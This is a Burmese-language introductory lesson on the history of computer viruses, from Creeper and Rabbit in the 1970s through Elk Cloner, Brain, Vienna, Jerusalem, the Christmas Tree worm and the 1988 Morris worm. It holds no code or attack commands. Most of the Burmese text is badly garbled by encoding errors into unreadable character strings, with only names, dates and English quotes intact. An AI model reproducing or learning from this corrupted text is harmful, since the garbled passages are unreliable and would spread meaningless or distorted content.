Virus Intro Lessons

Virus မား��၏ အထပၸတ �

ဒ�အေ�ၾကာ�ငး��ရာေ�အေတြ�ကာ�� မဖ��ငး�� "Virus ဆ�တ� self- replication computer program တစချ��ဖစချ��ပ�� အ�ခား�� executable code (သ�႔) documents မား��ထ�က� သ�႔တ�႔က�ယသ� တ�႔ copy က��ထညျ"��ခားငး�� အ��ဖငး"�� က��စချက��ပန �႔%�&'႕ ေ�စချတ��ဖစချ*ယသ�" ဆ��႔ �ခ�ကာ� �� အေမ�လ��႔ မ ဖစပါ"#ဘး%�... ��ဒ��ခ�ကာ� ��အေမ�အေနမယဆ( ��ရာေငး ဒ� Post ကာ�� န��မလည *��ငး"#ဘး%�... ကာ%�စပါကာ ခငး��ဆငး�+(ငး�+��,� " Virus ဖနတးျ.�� ခငး� ( ၁ ) ၊ ( ၂ ) ၊ ( ၃ ) " မ�� ရာေ�ငး� ပခ�႔ ပ��ပ# ပ�"....Virus သမ��ငး� �စပါမ��ဆ��ရာေငး ပထမဆ6��" တြထကာအေပၚခ�႔��႔ Virus အေ�ၾကာ�ငး�န�႔ ပ�8 �9 ��႔ အေတြဆ�အေ*:� ငးငး�ခ6�မ;အေတြ�ဟာ� �ဆ6��မရာေ�� တြထကာအေပၚခ�႔ပ#�ယဆ..ဘး�အေၾကာ�ငး�=9�ဆ��အေ�� ၁၉၇၀ ၀န �ကာ�ငးအေလ�ကာ�� malware အေတြ� attack လ�ပ��႔ၾကာလ��႔ပ#...�ခ��A႕သ%အေတြ�ကာ ဒ� malware အေတြ� attack လ�ပ��႔��ကာ�� ထပသြပDငး� အေရာေတြ�ကာ��႔��႔ �တြ�ကာအေၾကာ�ငး� ဖစပါ"#�ယဆ...malware လ��႔ဆ��အေပမယဆ� အေယဆဘး%ယဆ�သ��ကာ +Eရာေ အေ ပ�ရာေရာေငးworms အေတြ� ဖစပါFကာ ပ�� virus အေ�� မဟာ��အေသ�ပ#ဘး%�... ဒ#အေၾကာ�ငး� ၁၉၇၀ အေ�စပါ�ပ��ငး� အေပၚတြထကာ��႔ ��အေတြ�န�႔ ပ�8 � ပ�� အေမ�:ခန �အေတြ�တြထကာအေပၚလ�ခ�႔�� ဖစပါ"#�ယဆ...သ��အေ႔သ�9ည� Computer Knowledge ပ��ငး�ကာ��ပ# ထည�:+8ငး�စပါဥး�စပါ��မယဆ( ��ရာေငးအေ�� Virus အေတြ�ရာေ�႕ သမ��ငး�ဟာ� ၁၉၈၁ မ��စပါ�ငး ခ��ယဆ9�,�႔ ယဆ%ဆ*��ငး"#�ယဆ ။

၁၉၆ေ.%�&�ငး��ပ�ငး�� - ၁၉၇. ေအစချ�ပ�ငး��%�&စချ0��၁၉၇၀ �ဥး�ပ��ငး�မ�� Arpanet (Advanced Research Projects Agency net) အေကာနတးျKပ�� Creeper လ��႔ အေခၚ��႔ worm �စပါ��ကာ�� စပါ�ငးအေတြ�႔ရာေ��ခ�႔ပ#�ယဆ...ဒ� worm ကာ�� Tenex operating system အေ��ကာ�� global computer networks မ��ဆ�သ��႔ သ%ဟာ�သ%ပL*�6႕႔*��ငးအေ��ငး ဖနတးျ.��ခ�႔ပ#�ယဆ...၄ငး�ဟာ� သ%႔ဟာ�သ% modem အေကာန�ဆငး� network �စပါ��ဆ�အေရာေ�ကာအေ��ငး ၀ငး*��ပသြငးNမ�ရာေ�� ပ�� remote system မ��ဆ�ကာ�� သ%႔ကာ��ယဆ8 O copy လ�ပ ခငး�� ဖငး� ကာ%�အေ ပ�ငး�ပ#�ယဆ...သ%ကာ � ခ�� system �စပါ��ထ�အေရာေ�ကသြားျကာ8 �� ပ��ဆ�� ရာေငး "I'M THE CREEPER : CATCH ME IF YOU CAN" ဆ��႔ message အေလ�အေဖ� ပ��"#�ယဆ... သ%န�႔ ကာပ9� ကပကာ"� program အေလ��စပါ��ထပသြပRကာ9 �ပ#�ယဆ ��ဒ#အေကာ�� Creeper ကာ�� *��မSငး�မယဆ� Reaper ပ� ဖစပါ"#�ယဆ... Reaper ကာ Creeper ကာ��လ��ကာT�� ပ�� delete လ�ပ"#�ယဆ... ��လ6��သ�ၾကာ��႔ "ပထမဆ6��" Anti-

virus progam လ��႔ အေ ပ�ရာေမ��ပ#ပ�...၁၉၇၄ ခ�*�စပါ�� ထပ ပ��တြထကာ9 ��႔ malware �စပါ��အေကာ�� Rabbit လ��အေ႔ခၚပ#�ယဆ ... သ%အေကာ�� system အေတြ�ကာ�� crash

လ�ပU��႔�တြ�ကာ သ%ကာ��ယဆ8 O ဘးကာအေပ#ငး�စပါ6�အေကာန မန မနတးျ(+ကပနတးျ(န ပ6��%:ပ�� *��ငး ပ�� မ�� ဖငး�အေ�� system �စပါ��အေကာန �စပါ��ကာ�� သ%႔ကာ��သ% copy မလ�ပ*��ငး"#ဘး%�...၄ငး�ကာ system resources အေတြ�မ�� ခ��အေ��ငး�အေနတးျKပ�� system ရာေ�႕ ထ��9 �ပ*��ငး�;အေတြ�ကာ�� န�မ�+(ငး�တြသ��အေ��ငး လ�ပ"#�ယဆ...၁၉၇၅ ခ�*�စပါ��အေ�� UNIVAC 1108 system �တြ�ကာ Pervading Animal လ��အေ႔ခၚ��႔ game �စပါ��အေရာေ�ခ�႔ပ#�ယဆ ...��ဒ� game ကာ user ကာ�� စပါ��၀ငးN��အေ��ငး အေမ�:ခန �အေအေတြ�မ� ပ��အေ�� user အေတြ��အေန��႔ သ�W၀#ကာ ဘး�လ�ဆ��ကာ�� ဆ6�� ဖ��ကာ��ပ#�ယဆ .... ဒ#အေပမယဆ�=9,ည� ဒ� game ကာ �ကာယဆ ဖစပါအေန�� အေကာ�� file ��ငး�မ�� သ%ကာ��႔သ% အေရာေ�ထည�*��ငးဖ��႔ပ� ဖစပါ ပ�� file အေတြ�ထ� အေရာေ� ပ�� ပ�လ�� အေမရာေ�အေရာေသ�ဘး%�လ��ဆ�� ကာ�� ဆ6�� ဖ�U��႔�တြ�ကာ �ခ��န အေတြ�ကာ�� ဖနတးျ.��အေ ပ�ငး�လ �ယဆ%ဖ��႔�တြ�ကာ"� ဖစပါ"#�ယဆ... executable file အေတြ�န�႔ �ဆ6��မ�� သ%ဟာ�သ%အေရာေ�အေ*��အေပ#ငး�စပါပ9� ,�ကာ"#�ယဆ..ဒ#ဟာ� Trojan ရာေ�႕ � ပA�မ%အေတြ� ဖစပါအေ��ငး �မငး9,�ပ��႔��လ�� ... အေမ��.ဆ ဖစပါ��႔��လ��ဆ��ကာ�� မဆ6�� ဖ�*��ငး��႔ပ#ဘး%�...ဒ�� ပA�မ%အေတြ�ဟာ� ယဆခ�အေခ�အေပၚ အေထ�ငးအေပ#ငး�မ��:စပါ�အေသ� Trojan မ��န�႔ �%ည�အေနပ#�ယဆ....JÃrgen Kraus ရာေ�႕

master thesis မ��အေ�� ဒ� Program ကာ�� Selbstreproduktion bei Programmen( Self-reproduction of programs)

လ��အေ႔ခၚခ�႔ပ#�ယဆ...

၁၉၈. အစချပ�ငး��ဒ�*�စပါ"��ငး�အေတြ�ကာ�� အေရာေ�ကာ9 ��႔ �ခ#မ��အေ�� Computer အေတြ�ဟာ� ပ��ပ�� ပ��အေ�� လ%သ6��မ��လ�ၾကာပ#�ယဆ...program

အေ�ရာေ�တြ�အေကာE နန�႔ software company အေတြ�အေကာနထ��. � မဟာ��အေပမယဆ�=9,ည�ပ� �စပါဥး�ခ�ငး�အေ�နန�႔ထ��9 �ပ�;ဟာ� ပ�� ပ��ကာ9 �ခ�႔ပ#�ယဆ....ဒ� Program အေတြ�ကာ�� general access servers- BBS အေတြ�အေကာန ��ကာT��ကာ ဖန အေ႔၀ ခငး�၊ လ�လ�ယဆ ခငး�အေတြ� လ�ပ*��ငး"#�ယဆ... ��ဒ�ရာေလဒX� ရာေကာNကာF ကာမ�ၾကာA�. �႔ Trojan horses အေတြ�၊ System ကာ�� အေ�*��ငး�+E,ယဆ�ကာအေပ�*��ငတငး.�႔ Program အေတြ� အေ� မ�ကာE Zမ��တြထကာအေပၚလ�ဖ��႔ �တြ�ကာ လမ�စပါ ဖစပါ��႔ပ#�ယဆ....

၁၉၈၁ - Wild ထ�မား& ပထမားဆ'�� Virus

Robert Slade ရာေ�႕ သမ��ငး�အေဖ� ပခ�ကာE ရာေဆ��ရာေငး.. အေယဆနအေ႔ခ� Virus မ��ကာ�႔ သ��႔ �လ�+ပ9,�ပ*��ငးU��႔�တြ�ကာ Wild ထ�ကာ�� စပါမ�သပ.�႔အေသဘး�မ��A�န�႔ ပထမဆ6��အေရာေ�ကာ9 ��႔ Virus လ��႔ အေ ပ�ရာေပ#လ�မ��ယဆ.. Texas A&M University အေကာနစပါ�ငး ပL*�6႕လ��ယဆ9 ��႔ �မ��ကာ လကာ�6ထ��ပ#�ယဆ... ��ဒ� Virus န�႔ န�မအေ[\�� "Elk Cloner" ဖစပါ ပ�� ပL႕*�6တြလယဆ. �႔ Bootable

virus ဖစပါ"#�ယဆ...Apple II computer မ��ကာ�� ကာ��ကာ. � ဖစပါ"#�ယဆ... diskettes ရာေ�႕ boot sector ကာ call အေတြ�ရာေ��လ��႔�ခ# သ%ကာ��ယဆ8 O တြ��ဆကာ9 ��ကာ"#�ယဆ...��ဒ� Virus ၀ငး ပ�ဆ��ရာေငး ဒ�လ��စပါ�သ��အေလ�အေတြ� screen မ��အေဖ� ပပ#�ယဆ.....

It will get on all your disksIt will infiltrate your chipsYes it's Cloner!It will stick to you like glueIt will modify ram tooSend in the Cloner!

၁၉၈၃ - ပထမားဆ'�� Virus စချမား��သပ��က3�တမား��Fred Cohen ကာ ၁၉၈၄ ခ�*�စပါ�� Computer Virus - Theory and Experiments ဆ��႔ စပါ��မ�ကာ�� ပသြငးDငး�ခ�႔ ပ�� computer virus အေတြ�ကာ�� ဓ�ပၸာ�ယဆ8 �� ခငး� န�႔ သ%ရာေ�႕ စပါမ�သပအေတြ�႔ရာေ��မ;အေတြ�ကာ�� အေဖ� ပခ�႔ပ#�ယဆ...သ%ရာေ�႕ စပါ��မ�မ��...

" On November 3, 1983, the first virus was conceived of as an experiment to be presented at a weekly seminar on computer security. The concept was first introduced in this seminar by the author, and the name 'virus' was thought of by Len Adleman. After 8 hours of expert work on a heavily loaded VAX 11/750 system running Unix, the first virus was completed and ready for demonstration. Within a week, permission was obtained to perform experiments, and 5 experiments were performed. On November 10, the virus was demonstrated to the security seminar."

လ��႔ အေဖ� ပထ��ပ#�ယဆ။ (Richard Skrenta ရာေ�႕ Elk Cloner အေ�သ�စပါ�� )

၁၉၈၆

Virus န�မအေ[\�� "Brain" ဖစပါ ပ��ကာမ�ၻလ6��ကာ�� ပထမဆ6��စပါ�ငး ပန *�6႕ ခ�႔��႔ IBM PC viurs ဖစပါ"#�ယဆ။ ဒ� Virus ဟာ� 360 KB diskettes အေတြ�ထ�မ�� စပါ�ငး ပန ႔*�6႕ ခ�႔�� ဖစပါ ပ�� ခဏခ�ငး�ဆ��သလ��ပ� �စပါ�မ�ၻလ6��န��ပ#� ပ

န ႔*�6႕တြသ��ခ�႔ပ#�ယဆ...ဒ� Virus အေ��ငး မငး��႔ရာေ��႔ လ��A႕ ၀�ကာ��အေကာ� �� computer �သ��ငး��၀��ငး�ကာ လ6��၀�ဆငး8ငး��Zဖစပါအေသ��႔ �ခ��နတးျ�� ခ�လ��မ�� A��6 �ၾသ:ဖယဆ9 �ပအေဆ�ငး *��ငး��႔ လ��႔ပ� ဖစပါ"#�ယဆ... ဒ� Virus ကာ�� တြထငး��႔��႔သ%အေတြ�အေကာ�� ပ#ကာစပါၥ�န မ� Basit Farooq Alvi န�႔ Amjad Farooq Alvi ဆ��႔ ည��စပါ��ငတ�နတးျ�စပါအေယဆ�ကာ ဖစပါ ပ�� floppy disk ရာေ�႕ boot

sector အေတြ�ကာ�� analyze လ�ပ��႔��႔� ပငး ကာ%�စပါကာ. �႔ နည�လမ�ကာ��လည� ��ကာU+နတးျ.��ခ�႔�� ဖစပါ"#�ယဆ...သ%��႔ကာ Virus

ရာေ�႕ text message ထ�မ�� သ%��႔ရာေ�႕ န�မည၊ လ�ပN� န�႔ ဖ�န �န6ပ#�အေတြ�ကာ��ထည�+c��ခ�႔ပ#�ယဆ...ဒ��ခ�ကာအေတြ��ရာေ သ%��႔ဟာ� ဒ� software ကာ�� တြထ+ငး8ငတOအေတြ� ဖစပါ ပ�� သ%��႔နတးျ��ငးd6အေကာန သ%��႔ရာေ�႕ မ%ပ��ပသြငး�ငး�+��,� �သ��မ�� ပA အေစပါခ�ငး.,ယဆcငး"#�ယဆ... ဒ#အေပမယဆ� ကာ6အေမကာ�ငး�:စပါ�ပ� သ%��႔ရာေ�႕ စပါမ�သပ�;အေတြ�ကာ�� ပ#ကာစပါၥ�နတးျSယဆNပ��ပ� :စပါန ႔ပစပါ��႔ရာေပ#�ယဆ... "Brain" ဟာ� စပါ��၀ငးN��စပါရာေ�အေကာ�ငး� ပ�� ပ�ရာေ�အေသသပ9��႔ ပထမဆ6�� Virus ဖစပါ"#�ယဆ... ဒ� Virus ဟာ� သ%��႔ ၀ငးအေရာေ�ကာအေန��႔ sector

ကာ�� ရာေ��အေ:ဖဖ��႔ၾကာ�A�စပါ��ၾကာ��႔�ခ# သ%��႔ကာ�� ရာေ��အေမတြ�႔*��ငးအေ��ငး နဂ��မ%လ Virus မရာေ��႔ �ပ��ငး�န�႔ �စပါ��ထ��လ��ကာ"#�ယဆ... အေ��အေ��9[f�႔ Virus ပ#ပ�...ဒ� ၁၉၈၆ ခ�*�ငတစပါc�,မ��ပ� DOS exe မ��ထ�သ��႔ code မ��ကာ�� အေပ#ငး�ထည� ခငး�� ဖငး� သ%��႔ကာ��ယဆ8 O��႔ copy ကာ%� ပ�� ဖန ��*��ငတငး.�႔ program �စပါ��ကာ�� Ralph Burger ဆ��သ% Programmer �စပါအေယဆ�ကာ� ရာေ��အေအေ:ဖတြ�႔ ရာေ��ခ�႔ ပနတးျ"#�ယဆ... ��ဒ� Programmer ကာ သ%ရာေ�႕ ပထမဆ6�� Virus အေလ�ကာ�� "VirDem" လ��႔ �မညအေပ�ခ�႔ ပ�� ဒ� Virus ရာေ�႕ :စပါမ�ရာေ[Dရ�ပ ပမ;အေတြ�လည� လ�ပအေဆ�ငး��႔ပ#�ယဆ... ဒ� Virus ကာ�� ၁၉၈၆ ဒ�ဇငးj�မ�� hacker မ��ပ#၀ငး.�႔ အေ အေမ��ကာE ဖြဖ�႔�စပါည�computer

forum �စပါ��ကာ အေၾကာ ငး�ခ�႔�� ဖစပါ ပ�� ထ��ခ��နတးျ� �ဓ�ကာရာေညရြ[mယဆ��အေကာ� �� VAX/VMS systems ( ဂ��မဏ�အေ မ�ကာ"��ငး� Hamburg ပ[nယဆ�� Chaos Computer Club) ကာ�� ဖ�A:ခငး�ဖ��႔ ဖစပါ"#�ယဆ...

၁၉၈၇

"Vienna" virus တြထကာအေပၚလ�ခ�႔ပ#�ယဆ... အေကာ�န�.�,�႔ သ�ခ��ၾကာ ပ�� ဖစပါ.�႔ Ralph Burger ကာ ဒ� Virus ရာေ�႕ copy �စပါ��ကာ��ရာေရာေ��ခ��ပ#�ယဆ... သ%ကာ ဒ� Virus ကာ�� စပါNစပါ� ဖ�Aဖ�ကာ9 ��ကာ ပ�� ရာေရာေ��ခ�႔��႔ result ကာ�� သ%ရာေ�႕ စပါ��ပ ဖစပါ.�႔ " Computer Viruses: a

High-Tech Disease" မ��အေဖ� ပထ�� ပ�� ပ[DOမ��ဆ�သ��႔ ဖန အေ႔၀လ��ကာ"#�ယဆ။ သ%ရာေ�႕ စပါ��ငတပc�,မ�� လ%သ�မ��ထငးT��႔ Virus အေရာေ�နည�အေ�တြ��အေ�ခၚမ�� န�႔ ဘးယဆ9 �� ပAလ�ပT�ယဆ( ��အေတြ�ကာ�� ရာေ�ငး� ပထ��ခ�႔ပ#�ယဆ...ဒ#အေတြ�ဟာ� computer

virus အေပ#ငး� ရာေ�အေထ�ငး�� ပ�� ဖနတးျ.��အေစပါဖ��႔�တြ�ကာ လ;6အေ႕ဆ�9,��ကာ. �ပ#ပ�...သ%႔စပါ��ငတပc�,မ��ပ#��႔ �ခ��A႕ Idea မ�� အေထ မ�ကာအေ��ငး မငး��႔�ယဆ9 ��႔ ဆ��*��ငး"#�ယဆ...��ဒ��စပါ*�ငတစပါc�,မ��ပ� ပထမဆ6�� file virus မ�� ဖစပါFကာ��႔ IBM PC virus မ��လည� တြလ�9 ပသြပN�အေရာေ�သ�� တြထကာအေပၚလ�ခ�႔ပ#�ယဆ...ထ��virus အေတြ�အေကာ�� COMMAND.COM file ကာ��သ� ကာ%�စပါကာ. ��ကာ��ကာ. �႔ "Lehigh" ၊ COM file ကာ�� ကာ%�စပါကာ. �႔ "Aprial1st" လ��႔လည� သ�ထ��ၾကာ��႔ "Suriv-1" ၊ EXE ဖ��ငတငး��ငတ� ကာ%�စပါကာ. �႔ (ပထမဆ6��ၾကာ�မ � မ��မ� ကာ%�စပါကာ. �႔ )"Surive-2"(Suriv = Virus backward )(ဒ�virus ကာ Jerusalem virus ကာ��တြထကာအေပၚလ�အေစပါခ�႔�� ဖစပါ ပ�� စပါS�ရာေ�ကာ�� ပ6��% ၅၀၀,000 :ပ�� ခငး� ဖငး� ပန ႔*�6႕ ပ#�ယဆ) ၊ COM န�႔ EXE *�စပါ��လ6��ကာ�� ကာ%�စပါကာ. �႔ "Suriv-3" ��႔ပ� ဖစပါFကာပ#�ယဆ...ဒ# �� ပငး��:စပါ�အေသ� Boot Virus ( USA တြ�ငး "Yale" ၊ နယဆ%�ဇ�လပသြနတးျfငး "Stoned" ၊ ��လ�တြ�ငး "PingPong") န�႔ ပထမဆ6�� self encode file virus ဖစပါ.�႔ "Cascade" ��႔ �သ��သ�� အေပၚတြထကာ9 �ခ�႔ၾကာပ#�ယဆ..။IBM Computer မ��မဟာ��F ကာ��႔ Apple Macintosh ၊ Commodore Amiga န�႔ Atari ST ��႔လည� Virus အေပ#ငး�မ��:စပါ��ကာ��ကာ� O�စပါကာ ခငး�ကာ�� ခ6ခ�႔ရာေပ#�ယဆ...။

၁၉၈၇ ခ�*�စပါ ဒ�ဇငးj�လ�တြ�ငး�မ��ပ� REXX language န�႔ အေရာေ�ထ��႔ �တြလ+နတးျ�ငတO�စပါကာ�; မနတးျ(+ကပနတးျ.�႔ network virus �စပါ�� ဖစပါ.�႔ "Christmas Tree" ဆ��အေပၚလ� ပနတးျ"#�ယဆ.. ��ဒ�Virus ကာ VM/CMS operating environments အေ��ကာ�� သ%ဟာ�သ%ပ� ပန *�6႕ ကာ%�စပါကသြားျကာ8 ��ပ#�ယဆ...ဒ�ဇငးj�လရာေ�႕ Virus ပL႕*�6႕��႔ ၃ရာေကာအေ မ�ကာအေန႔ အေလ�ကာ��ပ� ��ဒ� Virus ကာ အေ�ရာေ�႕ ဂ��မဏ��ကာoသ��လ. စပါ��တြ�ငး�မ�� Bitnet network ဆ�သ��႔ စပါ�ငး မ��( ကာ��႔ပ#�ယဆ... ��ဒ�အေန�ကာ IBM Vnet ဆ�ကာ��အေရာေ�ကသြားျကာ8 ��ပ#�ယဆ... ၄ရာေကာအေ မ�ကာအေန႔ ဖစပါ.�႔ ( ဒ�ဇငးj� ၁၃ရာေကာအေန႔)မ�� Virus ဟာ� သ%႔ရာေ�႕ copy အေတြ� network ထ�မ�� ပည�=9�Lတြသ��႔ �တြ�ကာ ရငတပ.န ႔တြသ��ယဆ... ��ဒ��ခ��နတးျ��ပ� virus ကာ သ%႕ရာေ�႕ output image ဖစပါ.�႔ ခရာေစပါNမ�8 စပါ"ငး အေတြ�ကာ�� စပါ�ငးcငတ��"#အေ��ယဆ... ��ဒ�အေန�ကာ အေ�ပ��ယဆ%လ�ပ*��ငတငး.�႔ system files NAMES န�႔ NETLOG ထ�မ�� ရာေ��႔ လ�ပN�အေတြ�န�႔ network users အေတြ��လ6��ဆ�ကာ�� virus ကာ သ%႔ဟာ�သ% copy ကာ%� ပ�� ပ��႔ပ#အေ��ယဆ........

၁၉၈၈၁၉၈၈ ရာေ�႕ ၁၃ ရာေကာအေန႔ အေသ�ၾကာ�အေန႔မ��အေ�� ကာမ�ၻ*��ငးd6အေပ#ငး�မ��:စပါ�ကာ ကာ�မၸာဏ�မ�� န�႔ �ကာoသ��လ��သ��႔

Jerusalem virus န�႔��% �သ�အေပ�ခ�ကာအေတြ�ကာ�� ရာေရာေ��ခ��ပ#�ယဆ။ ��ဒ�အေန႔မ��ပ� virus ကာ run အေန��႔ file မ��ကာ�� ဖ�ကာ( ��အေနပ# ပ�။ အေသခ��အေသလ�အေကာ� �� ဒ� Virus ဟာ� �မ�ၻလ6��မ�� မ�+နတးျ.ကာယဆ"L႔*�6႕ ခ�႔��႔ ပထမဆ6�� MS-DOS virus �စပါ�� ဖစပါ"#�ယဆ..။ အေဥးရာေ�ပ၊ အေ�မရာေ�ကာ န�႔ အေ�ရာေ�႕�လယဆ"��ငး�အေဒသမ��မ� computer မ�� ကာ%�စပါကာ. ��ကာ��ကာ�6ရာေ��႔ သ�ငး�မ��လည� တြထကာအေပၚလ�ခ�႔ပ#�ယဆ။ ဒ� Virus ရာေ�႕ န�မ[\ သ% ��ကာ��ကာ� O�စပါကာ��႔��႔ အေနရာေ��စပါ�� ဖစပါ.�႔ အေဂ�ရ�စပါလငး �ကာoသ��လ� �� ရ��ကာ��႔� ပ��မ�� မ��ထငးTရာေ��ခ�႔�� ဖစပါ"#�ယဆ။ �ခ�အေခ�အေပၚ anti-virus programs မ��မဟာ��F ကာ��႔ anti-virus programs အေတြ�၊ user အေပ#ငး�မ��:စပါ�န�႔ ကာတြqမ�ကာ�ငး8ငတOအေအေတြ��ငး Virus အေတြ�ရာေ�႕ ရ� ငတငး8,နတးျ�;ကာ�� မယဆ6�ၾကာည*��ငးအေလ�ကာအေ��ငး"� Jerusalem virus န�႔��% မ��:စပါ�အေသ�� ခ�� virus မ�� ( "Cascade", "Stoned", "Vienna") ��႔ဟာ� အေထ�ငးအေပ#ငး�မ��:စပါ�အေသ� computer မ��ကာ�� မ��ထငး ကာ%�စပါကာ. ��ကာ��ကာအေနခ�႔ပ#�ယဆ...��ဒ��စပါS�ငတစပါc�,မ�� အေကာ��Fကာ��ထငးT��႔ ဂ*r၀ငးcomputer ဂရ�ၾကာ�� ဖစပါ.�႔ Peter Norton ကာ ဒ� virus အေတြ� တြထကာ9 �အေ��မ��မဟာ��j O�လ��႔ အေၾကာ ငး�ခ�႔ပ#�ယဆ...ဒ�အေၾကာ ငး�ခ�ကာ� စပါ�� O�ယဆဥး(ပသြနတးျsန �ပ#�ယဆ...ဒ#အေပမယဆ� �ခ��*��အေ�� မ ဖစပါ"#ဘး%�... ဘး�လ��႔လ�ဆ��အေ�� အေန�ကာ. ခ��နတးျ�� Symentec ရာေ�႕ Norton Anti-virus project ကာ�� စပါ�ငးU��႔�တြ�ကာ ဖစပါ9�ခ�႔လ��႔ပ#...။

messages �မ��အေတြ�ကာ��ပ��႔ ခငး� ဖငး� user မ��ၾကာ�� ထ�န �မ*��ငတငး8�မ�မအေရာေလ�ကာအေ��ငး အေၾကာ�ကရြကာT6႕တြသ��အေစပါ��႔ န�မ[u��န�႔ အေကာ��Fကာ��လ��႔ computer virus �သစပါအေတြ� တြထကာအေပၚလ�ခ�႔ ပနတးျ"# ပ�... BBS systems ဆ�သ��႔ messages �မ�� ပ�� uploaded လ�ပ ပ�� virus အေတြ�ကာ�� သ%႔��႔ကာ��ယဆ8 O��႔ copy လ�ပ ခငး� ဖငး� BBS �စပါ��မ� � ခ��ဆကသြားျကာ8 ယဆc ��႔ modem ဆ�သ��႔ speed 2400 bund ကာ��သ6�� ပAခ�႔�ယဆ9 ��႔ ပထမဆ6�� Hoaxes virus အေတြ�ဟာ� ပAလ�ပ��v��႔ Mike RoChenle ကာဆ��ပ#�ယဆ...။ ��ဒ�အေခ�E ခ#��န �ကာ Hoaxes virus ��ကာ��ကာ�6ရာေ��႔�ခ��နတးျ�� user အေတြ�ဟာ� စပါ6သ��ကာE ရာေ 2000 baund အေလ�ကာ� ��အေပ�လ��ကာTပ#�ယဆ...ဒ��ကာ��ကာ�;ဟာ� သ%��႔ရာေ�႕ modem speed ကာ�� 1200 baud အေလ�ကာ�ထ� န�မ�+(ငး�တြသ��အေစပါပ#�ယဆ...�လ��% Hoaxes virus အေတြ�ဟာ� ယဆခ�အေခ�E ထ�အေ��ငး တြထကာအေပအေၚနဆ�ပ#... Hoaxes

virus အေတြ�ထ�မ�� အေ�ကာ��Fကာ��ဆ6��အေကာ�� GoodTimes န�႔ Aol4Free ��႔ ဖစပါ"#�ယဆ...MacMag virus ဟာ� Macintosh (Apple PC) အေအေတြ�ပၚမ� Hypercard stack virus �စပါ�� ဖစပါ ပ�� ပထမဆ6�� Macintosh

virus လ��႔ အေယဆဘး%ယဆ�အေ�နန�႔ ယဆ%ဆ*��ငး ပ�� Scores virus အေကာ�� Macintosh ကာ%�စပါကာ ပနတးျS�6အေ႕စပါ��႔ အေ�ရာေ��ၾကာ��ဆ6�� ဓ�ကာ source ဖစပါ"#�ယဆ...။ သ��အေ႔သ�9,ည� Apple malware ကာ Macintosh ကာ�� မကာန ႔သ�*��ငး��႔ပ#ဘး%�...။ ၁၉၈၈ ခ�နတးျ�စပါ

:ဇ=နတးျ9�တြ�ငး�မ�� Festering Hate ရာေ�႕ ��တြထငး�;အေကာန Apple ProDOS virus ကာ��အေတြ�႔ရာေ��ခ�႔ပ#�ယဆ...။၁၉၈၈ *��၀ငးj�လမ��အေ�� Cornell University မ� အေကာ��ငး�သ��စပါဥး� ဖစပါ.�႔ Robert Tappan Morris ဖနတးျ.��လ��ကာ. �႔

Internet Worm(Morris network virus ) ဟာ� Internet ကာ�� ကာပ(� ငတ��အေကာ�ရာေ�ကာအေစပါ ပ�� computerအေပ#ငး�မ��:စပါ�ကာ�� Shut

down ပAလ�ပသြပD��ပ#�ယဆ...။ USA ( NASA research Institute �ပ#�၀ငး) မ� Computer system အေပ#ငး� ၆၀၀၀ အေကာ�� virus ကာ%�စပါကာ ပန ႔*�6႕ ခ6ခ�႔ရျZပ�� ခ�ကာ��ငး�ပ� သ%��႔ရာေ�႕ လ�ပdန �အေတြ�ရငတပ.န ႔�6�႕ ဆ��ငး�တြသ��ခ�႔ရာေပ#�ယဆ...။ ဘး�အေၾကာ�ငး�=9�ဆ��အေ�� "Christmas Tree" worm လ��ပ� ဒ� Virus ဟာ� �သမ�. ည�မရာေ��႔ code အေတြ�ကာ�� သ%႔ဟာ�သ% copy ကာ%� ပ�� ခ�� network computer မ��ဆ�ကာ�� အေပ�ပ��႔ပ#�ယဆ... ဒ�လ��အေ�ၾကာ�ငး�အေအေတြ�ၾကာ�ငး� network resource အေတြ��လ6��ကာ�� လ6��၀ �6�႕ဆ��ငး�ရငတပ.န ႔တြသ��အေစပါပ#�ယဆ။ ဒ� virus ကာ VAX န�႔ Sun Microsystems Morris �တြ�ကာ operation

systems Unix ထ�မ�� error မ�� virusအေတြ� :ပ��လ�ဖ��႔�တြ�ကာE သ6�� ပAခ�႔ပ#�ယဆ...။ Unix ထ�မ� error မ��န�႔��% virus

ကာ နဂ��မ%ရာေငး� idea အေပ#ငး�အေ မ�ကာ��:စပါ�ကာ��လည� �ကာ��A�ရာေ��ရာေ��သ6��ခ�ခ�႔ပ#�ယဆ( ဥးပမ� - User ရာေ�႕ Password မ��ကာ�� ရာေယဆ% ခငး�)..။ Morris Virus အေၾကာ�ငး �ခန ႔မ�န �အေ ခကာ�အေနတးျ��ငတ:ငး ၉၆ မ�လ�ယဆ6 အေဒၚလ� ဖ��အေလ�ကာ ပ�ကာ( ��ဆ6��ရာေ;6�ခ�႔ရာေပ#�ယဆ...။ ဒ#အေၾကာ�ငး� CERT ( Computer Emergency Response Team) ကာ�� ဒ�လ��မ�� A� ��ကာ��ကာ�;မ��တြ�ကာ အေ ဖရာေ�ငး�ဖ��႔��၀န �ပ*�ငး�ခ�႔ပ#�ယဆ...။၁၉၈၈ ဒ�ဇငးj�လ : DECNet မ�� worm virus အေတြ�ဆကာ9 ကာ. ��ကာ��ကာအေနဆ�ပ# ။ ယဆဥးအေကာ��သန ႔ရာေ�ငး��႔ out အေတြ�၊ image အေတြ��% user အေတြ�ကာ�� "stop computing and have a good time at home!!!" ဆ�� ပ�� အေမ�W�ရာေပ�6��႔ HI.COM worm virus အေအေတြ�ပၚတြထကာ9 �ခ�႔ပ#�ယဆ။ ဒ��ခ��နတးျEငတတြ�ငး�မ��ပ� anti-virus program �သစပါအေတြ�လည� တြထကာအေပၚလ�ခ�႔ပ#�ယဆ ( ဥးပမ� - အေယဆနအေ႔ခ�. ��ငး �သ6�� ပAအေနဆ� ဖစပါ.�႔ Doctors Solomon ရာေ�႕ Anti-virus Toolkit )...။

